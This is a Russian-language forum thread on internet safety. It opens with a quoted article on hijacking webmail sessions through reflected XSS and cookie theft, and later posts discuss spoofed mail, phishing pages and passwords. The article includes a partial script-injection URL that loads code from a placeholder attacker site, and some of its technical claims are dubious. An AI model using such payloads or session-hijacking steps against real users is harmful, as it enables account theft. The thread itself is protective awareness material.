Безопасность в интернете.

Прошу выкладывать сюда информацию по вопросам безопасности в интернете.

И начну.

"Взлом мыла с помощью пассивной xss.
1.
Я не буду вдаваться в термины. Общими словами.
У взломщика есть сниффер.
Снифферы - это программы откладывающие информацию о пользователе в специальные файлы.

То есть внимание!
Для того, чтобы информация о Вас появилась у взломщика, Вы должны войти с ним в "контакт", то есть нажать на предложенную им ссылку. Это важно!

Дальше взломщик делает так.
Gрикрепляет скрипт для атаки к ссылке, у него получается очень длинная шняга. Ну типа там:
http://ВЗЛОМЩИК.ru/###********=">%3CSCRIPT type=text/javascript src=http://САЙТ ДЛЯ ПАССИВНОЙ XSS АТАКИ.ru/oirnkldvoeihvds.
Он маскирует её, используя специальные сревисы. Адреса я здесь давать не буду ))) Фигушки. )
В конце концов он добивается того, что ссылка выглядит так:
http://ЗНАКОМЫЙ ВАМ САЙТ.com/823p5w9

Теперь вперёд ))) Посылаем эту ссылочку жертве )
Она кликает на неё и мы получаем её куки.

Cookies не могут делать ничего, это только лишь некоторая текстовая информация. Однако сервер может считывать содержащуюся в cookies информацию и на основании ее анализа совершать те или иные действия. Например, в случае авторизованного доступа к чему либо через WWW в cookies сохраняется login и password в течение сессии, что позволяет пользователю не вводить их снова при запросах каждого документа, защищенного паролем.

Понимаете? нет?
Объясняю.
Если Вы выходите с форума просто закрыв браузер, то Ваша сессия посещения не закрывается, а виртуально существует какое-то время.
Это-то и нужно взломщику. ) Он меняет свои куки на Ваши, тем самым имитируя Вашу сессию и пиздец. )
Вы приплыли. )
Ваш ящик, на какое-то время становится его.
На какое-то, это значит до тех пор, пока он не выйдет из Вашей почты. Если он выйдет, то куки изменятся и ему снова нужно будет проделывать все операции описанные выше, чтобы перехватить куки от Вашей новой сессии. )

Угнать Ваш ящик взломщик не сможет, потому что для смены пароля, многие нормальные сервисы требуют сперва ввести старый пароль.
А в куках, пароль представлен в виже хэша, ну типа вот такой шняги:
kawjhfuefhkzxjdbvieurthlekrndckwiehdihcwjenbfisuhvcieuhf.
Имея только чистый хэш, пароль не узнаешь. )

Таким образом у взломщика есть время, чтобы насолить Вам только раз. ) Пока он у Вас в ящике под теми куками, которые Вы ему отдали, нажав на ссылку.

Теперь меры предосторожности.
1. Всегда выходить с форума нажав кнопочку "Выход".
2. Не нажимать подозрительные ссылки.

Тут имхо, поскольку я не профи.
Если оч хочется сходить по ссылке, не вопрос. Клопируем её, выходим с форума и вбиваем в адресную строку браузера. При этом не забыв выйти из своей почты. )

2.
Как насолить человеку вообще его не ломая.
Очень просто. ) Достаточно узнать его почтовый ящик. )))))
Есть сервисы, позволяющие отправлять письма вообще с любого мыла. ))))))
При этом "взломщик", только отправляет их, получать ответы будете Вы.
Создаётся иллюзия, что Вас взломали, но это, повторяю, только иллюзия. )
Как определить, что кто-то отправляет письма с вашего ящика пользуясь такой прогой?
Очень просто.
В ответе будет стоять переадресация, с того сервера, которым пользуется взломщик.
Ваше мыло будет с префиксом.
Ну например Ваше мыло [email protected], а будет ХИ-ХИqwerty&ya.ru

Так что не дёргайтесь )) На все грубые ответы Вам на ящик забивает болт. )
Ваши друзья на то и друзья, чтобы знать вас и понять, что грязь от Вас прийти не может.
Остальных по боку."(С)

За статейку спасибо)
Да,еще по поводу почты.
Как посоветовал знакомый,лучше привязывать к телефону почту.
Абсолютный пень во всех этих компьютерных штучках,но насколько поняла,ломают как раз через почту акки на сайтах.
Или я не права?

Надо бы узнать у специалистов и если кто-то знает как лучше это сделать, то пожалуйста отпишитесь тут.

От себя лично, что понимаю.

Мне кажется, что самая безопасная почта на Гугле.
Плюс еще еще есть какие то приколы с криптографией писем.

Может кто разъяснит?

Ой спасибо-низко кланяюсь.Не поняла больше половины,потому,что я с этими вещами всеми по принципу "Ты кто"

Есть один ресурс,на котором бываю(не буду показывать пальцем),есть один ящик,которым пользуюсь-всего остального-ссылок там всяких и прочее-реально боюсь-до сих пор кажется-нажму и мой комп взлетит в воздух)))

Чего ж так грустно быть такой глупой?

Уффф,завтра постараюсь еще раз вдумчиво все прочитать-может дойдет..как до жирафа)

Спасибо еще раз за нужную информацию-как почитаешь-там взломали,тут взломали-сидишь и думаешь-"Может ты следующая?"

Дорис ты умничка... я тож вроде написано по Русски... перечитал дважды.... так и не понял о чём... Ведь есть оказываются проблемы. Есть. Вот только если в этом сооброжаешь типа меня то и проблема не существует.

Оле,нееееееее.

На работе-одно,я,если честно-даже его пароль не знаю и к нему есть доступ у наших,ну,которые по компам главные-у них пароль хранится-только я это мыло онли в рабочих целях использую-пусть читают-мне не жалко.Не знаю связь между почтой и компом-но на пайнарт с рабочего компа я не захожу даже мысленно.Приснился мне как то кошмар,что захожу я на пайн и бах-у меня ломается комп.Заходит шеф его чинить-чинит,включает и грозным голосом говорит,видя авки с членами-"Так вот ты чем в рабочее время занимаешься?"Брр,аж передернуло)
Все же-если не считаешь себя продвинутым пользователем(это я о себе-)нефиг региться на рабочую почту на порноресурсах.

Вот как раз таки спасибо ГРОМОВЕРЖЕЦ !вовремя разьяснил!теперь чётко-ясно что мой ящик пару дней назад попал под Взлом мыла с помощью пассивной xss.Предложенная схема верна.
А как тогда с безопасностью ящика?...запрет параллельных сессий,вход только с 1 IP адреса...т.д..как оно безопасит то???

бойтесь ссылок на почтовый сервис предложеный под предлогом "
проверьте ваш почтовый ящик или вам на почту отправлено письмо

змаскироваться под почтовый ресурс очень просто скопировав его главную страницу и думая что вы на входе в почтовый ресурс вы водите все свои данные а злоумышленик просто считывает их без никаких премудростей .....

молодец но фейки существуют до сих пор и многие на них попадаются..... оооочень многие

В продолжении беседы.
Предположим надо поменять пароль и сделать его максимально простым для себя и сложным для других;).

Почитайте эту статью, вроде написано очень доходчиво.

http://www.chaynikam.net/view_lesson.php?id=46

О да!!!!сегодня, как никогда,тема пароля повеселила тут многих)))

Чем же она всех повеселила?